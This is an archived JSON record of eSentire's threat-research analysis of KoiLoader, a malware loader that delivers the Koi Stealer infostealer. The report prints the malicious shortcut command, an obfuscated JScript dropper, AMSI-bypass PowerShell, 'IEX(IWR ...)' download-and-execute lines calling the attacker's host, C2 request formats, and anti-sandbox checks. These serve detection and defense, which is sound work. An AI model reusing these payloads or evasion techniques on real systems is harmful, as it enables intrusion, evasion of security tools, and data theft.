{
	"id": "07f3fbd2-457b-4926-af33-8a23e2b73545",
	"created_at": "2026-04-06T01:29:46.37483Z",
	"updated_at": "2026-04-10T03:35:21.407381Z",
	"deleted_at": null,
	"sha1_hash": "8f9fee342c91c7ecbf623ccb90b9702637ba5618",
	"title": "The Long and Short(cut) of It: KoiLoader Analysis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1467451,
	"plain_text": "The Long and Short(cut) of It: KoiLoader Analysis\r\nBy eSentire Threat Response Unit (TRU)\r\nArchived: 2026-04-06 01:15:26 UTC\r\nAdversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters\r\nand Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.\r\nWe have discovered some of the most dangerous threats and nation state attacks in our space – including the\r\nKaseya MSP breach and the more_eggs malware.\r\nOur Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced\r\nThreat Analytics driven by our Threat Response Unit – the TRU team.\r\nIn TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We\r\noutline how we responded to the confirmed threat and what recommendations we have going forward.\r\nHere’s the latest from our TRU Team…\r\nWhat did we find?\r\nIn March 2025, the eSentire Threat Response Unit (TRU) detected an intrusion attempt involving the use of a\r\nshortcut file leading to the loading of a new version of KoiLoader, a malware loader that facilitates Command and\r\nControl (CnC), and downloads/executes Koi Stealer, an information stealer written in C# with advanced\r\ninformation stealing capabilities.\r\nInfection Chain\r\nThe infection chain can be seen in the figure below.\r\nhttps://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis\r\nPage 1 of 20\n\nFigure 1 – Infection chain\r\nInitial Access\r\nInitial access is achieved through a spam email and link to a zip file, “chase_statement_march.zip”, similarly to\r\nour prior report. Within the zip file, the victim clicks a shortcut file named “chase_statement_march.lnk”, which\r\nserves to download and execute KoiLoader. 
This shortcut file makes use of a well-known, low-severity bug in Windows to effectively conceal the command line arguments when viewing the file's properties.\r\nAs seen in the figure below, the “Target” field is truncated and the remaining contents of the malicious command cannot be viewed.\r\nFigure 2 – Shortcut file using ZDI-CAN-25373\r\nThe full contents of the malicious command can be seen below. First, two JScript files are downloaded to C:\\ProgramData\\g1siy9wuiiyxnk.js and C:\\ProgramData\\i7z1x5npc.js. Next, a scheduled task is created using the LOLBin “schtasks.exe” to run the JScript file g1siy9wuiiyxnk.js.\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -command $pdw = $env:programdata + '\\' + ('g1siy9wuii\r\nFigure 3 – Malicious command from lnk file\r\nThe contents of g1siy9wuiiyxnk.js can be seen below. The purpose of the script is to delete the scheduled task created before and run a new instance of wscript to execute i7z1x5npc.js.\r\nIt is highly likely that this technique is being used to evade detection: the parent process of wscript.exe is usually explorer.exe in attacks involving the user double clicking a script file, whereas using this technique the parent process is svchost.exe, giving the impression that WScript was launched by a more trustworthy parent process chain.\r\nvar dol3 = new ActiveXObject(\"WScript.Shell\")\r\ndol3.Run(\"powershell -command \\\"schtasks /delete /tn \" + WScript.arguments(0) + \" /f; wscript $env:programdata\\\\\r\nFigure 4 – Contents of g1siy9wuiiyxnk.js\r\nThe contents of the script i7z1x5npc.js can be seen below, which performs the following actions:\r\n1. Acquires the victim machine’s unique identifier GUID via the registry key “HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid”.\r\n2. 
Copies the current script (i7z1x5npc.js) to C:\\ProgramData\\“r” + \u003cGUID\u003e + “r”.js.\r\n3. Sends two GET requests to download two PowerShell scripts delivered via the URLs “https://casettalecese[.]it/wp-content/uploads/2022/10/boomier10qD0.php” and “https://casettalecese[.]it/wp-content/uploads/2022/10/nephralgiaMsy.ps1”. The responses are then evaluated as code via Invoke-Expression (IEX).\r\nvar f1=\"Scr\",f2=\"ing.Fi\",f3=\"stemOb\"\r\nvar fso = new ActiveXObject(f1+\"ipt\"+f2+\"leSy\"+f3+\"ject\")\r\nvar w1=\"WSc\",w2=\"riPt\",w4=\"eLl\"\r\nvar wsh=w1+w2+\".sH\"+w4\r\nvar bbj=new ActiveXObject(wsh)\r\nvar fldr=GetObject(\"winmgmts:root\\\\cimv2:Win32_Processor='cpu0'\").AddressWidth==64?\"SysWOW64\":\"System32\"\r\nvar rd=bbj.ExpandEnvironmentStrings(\"%SYSTEMROOT%\")+\"\\\\\"+fldr+\"\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"\r\nvar agn='r'+bbj.RegRead('HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\MachineGuid')+'r.js'\r\nif (WScript.ScriptName != agn) {\r\n    var fs5=\"yFi\"\r\n    try {\r\n        fso[\"Cop\"+fs5+\"le\"](WScript.ScriptFullName, bbj.ExpandEnvironmentStrings(\"%programdata%\")+\"\\\\\"+agn)\r\n    } catch (e) {}\r\n}\r\nvar mtx_name=\"7zAVOXWBV1U0\"\r\nvar mtx_file = bbj.ExpandEnvironmentStrings(\"%tem\"+\"p%\")+\"\\\\\"+mtx_name\r\nvar fs1=\"leteFi\"\r\nvar fs2=\"leExis\"\r\ntry {\r\n    fso[\"De\"+fs1+\"le\"](mtx_file)\r\n} catch (e) {}\r\nif (!fso[\"Fi\"+fs2+\"ts\"](mtx_file))\r\n{\r\n    bbj.Run(rd+\" -command \\\"$typs=[Ref].Assembly.GetTypes();$bss = 'https://casettalecese[.]it/wp-content/uploads/20\r\nFigure 5 – Contents of i7z1x5npc.js\r\nThe purpose of the first PowerShell script (boomier10qD0.php) is to disable the Antimalware Scan Interface (AMSI).\r\n$vl1 = (\"L8Ek1EOLdflxxTT2W20qMJ0EsGk12dZO5jxvxTT2W20qMJ0EMRc4Ar2q6SDDxTT2W20qMJ0EVEWXewxquV3axTT2W20qMJ0Eybr4Br\r\n$v2=$c.GetFields(\"NonPublic,Static\")\r\nForeach($v3 in $v2) {if 
($v3.Name -like \"*am*ed\") {$v3.SetValue($null, $vl1)}}\r\nFigure 6 – Contents of PowerShell returned via boomier10qD0.php\r\nThe purpose of the second PowerShell script (nephralgiaMsy.ps1) is to download the KoiLoader payload, allocate/write shellcode, allocate/write the KoiLoader payload, and execute the shellcode via the CreateThread API call, leading to the execution of the KoiLoader payload.\r\nFigure 7 – Contents of nephralgiaMsy.ps1\r\nKoiLoader Stage 1\r\nThe first stage of KoiLoader serves to unpack and execute the next stage. This process can be automated by using our KoiLoader extraction script available here. The unpacking routine makes use of a hashing algorithm to resolve the Windows APIs: FindResourceW, LoadResource, and SizeofResource.\r\nIt then calls these APIs to acquire two resources within the PE file that store the next stage encrypted payload and an XOR key. The payload is then written to memory, marked executable, and the OEP is called.\r\nFigure 8 – Unpacking routine\r\nThe routine responsible for extracting resources from the PE file can be seen below. The routine essentially resolves the aforementioned APIs and calls them in order to extract the embedded resource within the PE file, returning a pointer to the extracted data.\r\nFigure 9 – Resolve APIs via hash, call APIs, and return pointer to resource data\r\nThe routine responsible for resolving APIs via hash can be seen in the figure below. This routine loops over exported names in Kernel32 and computes a hash for each. 
If the hash matches the dwHash argument supplied to the function, a pointer to the resolved API is returned.\r\nFigure 10 – Resolve APIs via hash\r\nThe following Python code re-implements the hashing algorithm implemented by the routine denoted in Figure 10 as “fn_compute_hash”. This Python code is also available here.\r\ndef fn_compute_hash(api_name):\r\n    dwhash = 0x00000000\r\n    for i in range(len(api_name)):\r\n        dwhash = dwhash \u003c\u003c 4\r\n        dwhash = ord(api_name[i]) + dwhash\r\n        a = dwhash \u0026 0xF0000000\r\n        if a != 0:\r\n            x = a \u003e\u003e 0x18\r\n            dwhash = dwhash ^ x \u0026 0xFFFFFFFF\r\n            a = (~a) \u0026 0xFFFFFFFF\r\n            dwhash = dwhash \u0026 a\r\n            continue\r\n        a = ~a\r\n        dwhash = dwhash \u0026 a\r\n    return dwhash\r\napi_name = \"FindResourceW\"\r\nhash_val = fn_compute_hash(api_name)\r\nprint(f\"The hash value for {api_name} is {hex(hash_val)}\")\r\n# The hash value for FindResourceW is 0x5681127\r\napi_name = \"LoadResource\"\r\nhash_val = fn_compute_hash(api_name)\r\nprint(f\"The hash value for {api_name} is {hex(hash_val)}\")\r\n# The hash value for LoadResource is 0x9b3b115\r\napi_name = \"SizeofResource\"\r\nhash_val = fn_compute_hash(api_name)\r\nprint(f\"The hash value for {api_name} is {hex(hash_val)}\")\r\n# The hash value for SizeofResource is 0xdaa96b5\r\nFigure 11 – Hashing algorithm in python\r\nThe routine responsible for decrypting the encrypted payload can be seen in the figure below.\r\nFigure 12 – XOR decrypt routine\r\nKoiLoader Stage 2\r\nThis stage contains the main functionality of KoiLoader, beginning with a check to ensure the malware isn’t running on friendly machines.\r\nThis check involves the use of the GetUserDefaultLangID Windows API and compares the return value against the following known friendly language identifiers: 
Russian, Armenian, Azerbaijani (Latin/Cyrillic), Belarusian, Kazakh, Tajik, Turkmen, Uzbek (Latin/Cyrillic), and Ukrainian. If a match is found, the malware exits.\r\nFigure 13 – Language checks, evasion function call\r\nEvasion\r\nThe evasion routine, denoted in the figure above as “fn_evasion”, serves to check multiple attributes to identify virtual machines (specifically Hyper-V, VMWare, VirtualBox, Parallels, and QEMU), security researcher machines, and sandboxes. This routine returns TRUE in the event a check passes, and the malware exits.\r\n1. Display devices are enumerated via the EnumDisplayDevicesW Windows API and checked against the following strings:\r\n   1. Hyper-V\r\n   2. VMWare\r\n   3. Parallels Display Manager\r\n   4. Red Hat QXL controller\r\nFigure 14 – Display devices check targeting Hyper-V, VMWare, Parallels, and QEMU\r\n2. The user’s Documents folder is checked for the following files:\r\n   1. Recently.docx\r\n   2. Opened.docx\r\n   3. These.docx\r\n   4. Are.docx\r\n   5. Files.docx\r\n3. The following files related to VirtualBox are checked:\r\n   1. C:\\Windows\\System32\\VBoxService.exe\r\n   2. C:\\Windows\\System32\\VBoxTray.exe\r\n4. The user's desktop directory is checked for the following files, checking if the files are 4 bytes in size and contain the string \"BAIT\":\r\n   1. Resource.txt\r\n   2. OpenVPN.txt\r\n5. Checks for the file “new songs.txt” in the user’s desktop directory. If the file is found, it checks to ensure the file is 0x37 bytes; if so, it checks for the string “Jennifer Lopez \u0026 Pitbull - On The Floor\\r\\nBeyonce - Halo”.\r\n6. Uses the Windows API GetUserNameW to get the username and lstrcmpW/StrStrW to determine if any of the following known usernames match:\r\n   1. Joe Cage\r\n   2. STRAZNJICA.GRUBUTT\r\n   3. Paul Jones\r\n   4. PJones\r\n   5. Harry Johnson\r\n   6. 
WDAGUtilityAccount\r\n   7. sal.rosenburg\r\n   8. d5.vc/g\r\n   9. Bruno\r\n7. Uses the API GetComputerNameW and lstrcmpW to determine if the following computer names match:\r\n   1. DESKTOP-ET51AJO\r\n   2. WILLCARTER-PC\r\n   3. FORTI-PC\r\n   4. SFTOR-PC\r\n8. Uses the GlobalMemoryStatusEx Windows API to determine if the machine has at least 3050 MB of physical memory.\r\n9. Checks the user's username against \"Anna\" and the computer name against \"ANNA-PC\".\r\nFigure 15 – Username, computer name, and memory size checks\r\n10. Next, the user's Documents folder is checked for files matching .doc, .docx, .xls, .xlsx that are 14 characters in length (excluding file extension). For matches, the file size is checked to ensure it equals 15. This is possibly used by the malware author for debugging purposes to ensure the final evasion method is skipped. For example, if they are debugging their malware as a process other than powershell.exe, they would create these files.\r\n11. The final evasion measure checks to see if the current process is named powershell.exe; if not, the malware exits. This check does not run if the prior check resulted in 21 or more matching files.\r\nFigure 16 – Test files/running as powershell.exe check\r\nUAC Bypass via ICMLuaUtil\r\nKoiLoader makes use of a known UAC bypass to create an exclusion in Microsoft Defender via the ICMLuaUtil elevated COM interface. The exclusion path is the same directory where the persistence script is located (C:\\ProgramData).\r\nFigure 17 – UAC bypass via ICMLuaUtil\r\nPersistence\r\nPersistence is then set up via a scheduled task to run the JScript dropper file from earlier (Figure 5), where the file name is the result of concatenating “C:\\ProgramData\\r” + \u003cMACHINE_GUID\u003e + “r.js”. 
The machine GUID is obtained via the registry key/value “HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid”.\r\nFigure 18 – Scheduled task\r\nMutex Generation\r\nThe C:\\ drive’s volume serial number is then acquired via the GetVolumeInformation Windows API and used in generating a GUID to use as a mutex. The Windows API CreateMutexW is then called to register the mutex, where the return value is checked to ensure the mutex doesn’t already exist. Otherwise, the malware exits, ensuring another instance of the loader isn’t running in parallel.\r\nFigure 19 – Create mutex based on C:\\ serial number\r\nPython code for generating the mutex can be seen below.\r\n# Volume serial number in hex format, can be acquired via PowerShell command:\r\n# (Get-WmiObject Win32_LogicalDisk | Select-Object VolumeSerialNumber).VolumeSerialNumber\r\nVOLUME_SERIAL_NUMBER = 0x5B23AC1F\r\n# Perform the calculations\r\ndef calculate_guid_parts(volume_serial_number):\r\n    v0 = 1219472 * volume_serial_number\r\n    data3 = (v0 - 18621) \u0026 0xFFFF\r\n    data1 = (1219472 * v0 + 1728536051) \u0026 0xFFFFFFFF\r\n    data2 = (-25712 * (data1 \u0026 0xFFFF) - 18621) \u0026 0xFFFF\r\n    return data1, data2, data3\r\ndef generate_custom_guid(data1, data2, data3):\r\n    guid_string = f\"{data1:08X}-{data2:04X}-{data3:04X}-F3F3-F3F3F3F3F3F3\"\r\n    return guid_string\r\nif __name__ == \"__main__\":\r\n    data1, data2, data3 = calculate_guid_parts(VOLUME_SERIAL_NUMBER)\r\n    mutex = generate_custom_guid(data1, data2, data3)\r\n    print(f\"Mutex: {mutex}\")\r\nFigure 20 – Mutex generation via python\r\nDownload/Execute KoiStealer via PowerShell\r\nThe routine responsible for downloading and executing KoiStealer can be seen below, which makes use of PowerShell to send a web request via the IWR (Invoke-WebRequest) cmdlet 
and evaluates the response as PowerShell code via IEX (Invoke-Expression).\r\nThe routine retrieves sd4.ps1 if the C# compiler v4.0.30319 (csc.exe) is present; otherwise sd2.ps1 is retrieved. Both files serve to download and execute KoiStealer.\r\nThe PowerShell command lines used are as follows:\r\n1. powershell.exe -command IEX(IWR –UseBasicParsing “https://casettalecese[.]it/wp-content/uploads/2022/10/sd4.ps1”\r\n2. powershell.exe -command IEX(IWR –UseBasicParsing “https://casettalecese[.]it/wp-content/uploads/2022/10/sd2.ps1”\r\nFigure 21 – Download/execute PowerShell that leads to KoiStealer\r\nCommand and Control\r\nKoiLoader uses HTTP POST requests for Command and Control purposes. The initial request to the C2 contains the victim machine’s GUID, a build ID unique to the campaign, and an X25519 public key encoded in base64. This initial request is denoted with “101” at the beginning of the POST request’s body.\r\nPOST http://94.247.42[.]253/pilot.php HTTP/1.1\r\nContent-Type: application/octet-stream\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nHost: 94.247.42.253\r\nContent-Length: 94\r\nProxy-Connection: Keep-Alive\r\nPragma: no-cache\r\nContent-Encoding: binary\r\n101|\u003cGUID\u003e|45LkAGkF|\u003cPUBLIC_KEY_BASE64\u003e\r\nThe next check-in request to the C2 contains the victim machine’s GUID, a 16 byte randomly generated string, and encrypted data containing the victim’s OS major version, minor version, username, computer name, and domain.\r\nData is encrypted by computing the X25519 shared secret and using it to XOR each plaintext byte. 
This request type is denoted with “111” in the POST data.\r\nPOST http://94.247.42[.]253/pilot.php HTTP/1.1\r\nContent-Type: application/octet-stream\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nHost: 94.247.42.253\r\nContent-Length: 94\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\nContent-Encoding: binary\r\n111|\u003cGUID\u003e|\u003c16_BYTE_XOR_KEY_PART_2\u003e|\u003cENCRYPTED_DATA\u003e\r\nFigure 22 – Collect OS info, domain\r\nThe next requests involve a loop that runs indefinitely to retrieve commands from the C2 server, with a one second wait between requests. This request type is denoted with “102” at the beginning of the POST request’s body.\r\nPOST http://94.247.42.253/pilot.php HTTP/1.1\r\nContent-Type: application/octet-stream\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nHost: 94.247.42.253\r\nContent-Length: 40\r\nProxy-Connection: Keep-Alive\r\nPragma: no-cache\r\nContent-Encoding: binary\r\n102|\u003cGUID\u003e\r\nThe response returned is then handled by a jump table (switch statement), where each command is represented as a single character. 
Each of the commands and their associated description can be seen in the following table.\r\nCommand Description\r\n0x67 Executes scripts/commands via Command Prompt\r\n0x68 Executes scripts/commands via PowerShell\r\n0x69 Enables system shutdown privilege for the running process and performs the shutdown\r\n0x6A Creates a scheduled task to run agent.js and removes agent.js if present on the host\r\n0x6C Establishes communication with a C2 server\r\n0x6E Performs process injection into either explorer.exe or certutil.exe based on the subsystem value (if the subsystem is Console User Interface, the payload is injected into certutil.exe; if it’s Graphical User Interface, the payload is injected into explorer.exe) or writes the payload to the %TEMP% folder and directly executes it (the naming convention for the payload is generated with a PRNG)\r\n0x70 Dynamically loads and executes a function from a DLL; in our sample, the export function is “Release”\r\nIn order to triage C2 activities, we created an emulation script available here. 
The script generates X25519 private/public keys and computes a shared secret for encrypting data sent to the C2 in the registration process, and features the ability to specify a proxy for connecting to the KoiLoader C2 and to generate a fake username/computer name.\r\nFigure 23 – KoiLoaderC2 class usage\r\nFigure 24 – KoiLoaderC2 class create private/public key, compute shared secret\r\nWhat did we do?\r\nOur team of 24/7 SOC Cyber Analysts proactively isolated the affected host to contain the infection on the customer’s behalf.\r\nWe communicated what happened with the customer and helped them with remediation efforts.\r\nWhat can you learn from this TRU Positive?\r\nPhishing emails continue to remain a key vector for malware distribution, demonstrating the continuous threat of social engineering attacks and the need for ongoing vigilance.\r\nThe utilization of Anti-VM capabilities by malware like KoiLoader and KoiStealer highlights the capability of modern threats to evade analysis and detection by analysts, researchers, and sandboxes.\r\nRecommendations from the Threat Response Unit (TRU):\r\nDisable wscript.exe via AppLocker GPO or Windows Defender Application Control (WDAC):\r\nC:\\Windows\\System32\\WScript.exe\r\nC:\\Windows\\Syswow64\\WScript.exe\r\n*:\\Windows\\System32\\WScript.exe (* represents a wildcard to include drive letters other than C)\r\n*:\\Windows\\SysWOW64\\WScript.exe (* represents a wildcard to include drive letters other than C)\r\nThe use of obfuscation and sophisticated delivery mechanisms by malware underscores the importance of implementing comprehensive detection strategies, including script logging and 
behavior-based detection mechanisms, to identify and mitigate threats.\r\nImplementing Phishing and Security Awareness Training (PSAT) programs is crucial to educate employees about emerging threats and mitigate the risk of successful social engineering attacks.\r\nUse a Next-Gen AV (NGAV) or Endpoint Detection and Response (EDR) solution to detect and contain threats.\r\nIndicators of Compromise\r\nIndicators of Compromise can be found here.\r\nReferences\r\nhttps://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer\r\nTo learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next Level MDR, connect with an eSentire Security Specialist now.\r\nABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)\r\nThe eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.\r\nSource: https://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.esentire.com/blog/the-long-and-shortcut-of-it-koiloader-analysis"
	],
	"report_names": [
		"the-long-and-shortcut-of-it-koiloader-analysis"
	],
	"threat_actors": [
		{
			"id": "2864e40a-f233-4618-ac61-b03760a41cbb",
			"created_at": "2023-12-01T02:02:34.272108Z",
			"updated_at": "2026-04-10T02:00:04.97558Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "ETDA:WildCard",
			"tools": [
				"RustDown",
				"SysJoker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e",
			"created_at": "2023-11-30T02:00:07.299845Z",
			"updated_at": "2026-04-10T02:00:03.484788Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "MISPGALAXY:WildCard",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775438986,
	"ts_updated_at": 1775792121,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8f9fee342c91c7ecbf623ccb90b9702637ba5618.pdf",
		"text": "https://archive.orkl.eu/8f9fee342c91c7ecbf623ccb90b9702637ba5618.txt",
		"img": "https://archive.orkl.eu/8f9fee342c91c7ecbf623ccb90b9702637ba5618.jpg"
	}
}